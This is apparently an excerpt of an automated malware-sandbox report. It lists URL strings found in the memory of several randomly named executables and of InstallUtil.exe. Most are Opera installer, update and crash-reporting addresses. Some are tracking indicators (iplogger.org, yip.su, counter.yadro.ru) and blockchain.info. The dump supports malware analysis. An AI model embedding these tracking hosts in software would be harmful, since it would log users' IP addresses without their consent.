                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000000.1978118196.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000000.2047880300.0000000000401000.00000020.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                        Source: syncUpd.exe, syncUpd.exe, 00000011.00000002.3320273607.000000006A41D000.00000002.00000001.01000000.00000035.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980476061.0000000002350000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980573238.00000000020F4000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000002.3178613149.0000000002100000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993807685.00000000020AC000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993674545.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173928635.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173383330.000000000061A000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000002.3176112237.0000000002130000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2051912319.0000000002360000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2052026418.0000000002124000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2146250771.000000000213C000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3180040054.0000000000858000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3191413694.0000000002148000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2138969685.0000000003230000.00000004.00001000.00020000.00000000.sdmp, mlSjlt4YcfcpuVp4aQsoCouK.exe, 00000022.00000003.2270698416.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org).
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000033BE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000347C000.00000004.00000800.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2134270418.0000000003A46000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2243137599.0000000003856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.opera.com0
                        Source: fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1981461612.0000000002350000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1982439256.0000000002108000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2053165938.0000000002360000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2053429105.0000000002138000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000000.2084798987.0000000000401000.00000020.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.remobjects.com/ps
                        Source: fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1981461612.0000000002350000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1982439256.0000000002108000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2053165938.0000000002360000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2053429105.0000000002138000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000000.2084798987.0000000000401000.00000020.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.remobjects.com/psU
                        Source: syncUpd.exe, 00000011.00000002.3309647738.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.000000000361D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003597000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000033B8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000375B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000033AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yip.su
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://addons.opera.com/en/extensions/details/dify-cashback/
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f.opera.com
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2880591845.000000005DE40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f28011C:
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3240139132.0000000035440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4fC:
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/9
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/:
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/B
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/DS
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/E
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000140B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/NS
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/P
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/geolocation/
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/https://autoupdate.geo.opera.com/geolocation/OperaDesktophttps://cr
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2909203765.000000005DEB0000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x64
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x644
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x646
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x64U
                        Source: 23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://blockchain.infoindex
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.iplogger.org/favicon.ico
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.iplogger.org/redirect/brand.png
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003799000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003254000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003376000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://counter.yadro.ru/hit?
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://crashpad.chromium.org/
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://crashpad.chromium.org/bug/new
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3152395662.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3211196755.0000000054654000.00000004.00001000.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3203950091.0000000054614000.00000004.00001000.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3162939013.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2213913866.000000005DE38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submit
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3152395662.00000000004E8000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3203950091.0000000054614000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submit--annotation=channel=Stable--annotation=plat=
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3216599702.00000000546B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submit--monitor-self-annotation=ptype=crashpad-hand
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3204991248.0000000054624000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submit0x2f4
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3216599702.00000000546B0000.00000004.00001000.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3211196755.0000000054654000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submitC:
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3211820860.000000005465C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submitTe
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3211196755.0000000054654000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crashstats-collector.opera.com/collector/submitTeB
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000140B000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/JD
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/lQ
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/r-sub.osp.opera.software/
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2539689632.0000000000C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binary
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binary0
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binary=
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryera.software7
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryetmsg.dll.mui7
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://desktop-netinstaller-sub.osp.opera.software/v1/binaryv
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2854158568.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2528084518.00000000044F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2581876700.00000000044F8000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2854158568.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2528084518.00000000044F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/C
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/I
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2875499690.000000005DE2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/d
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3288684476.0000000035533000.00000004.00001000.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3263332828.000000003548C000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2613936298.000000005DF34000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2903459816.000000005DE8C000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2924292015.000000005DEE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2906005390.000000005DE9C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1/x64
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3263332828.000000003548C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=15H
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3265307693.000000003549C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=15I
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2903459816.000000005DE8C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1Assistant_108.0.5067.20_Setup.exe
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2928403310.000000005DEF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.opera.com/download/get/?id=65199&autoupdate=1&ni=1&stream=stable&utm_campaign=767&u
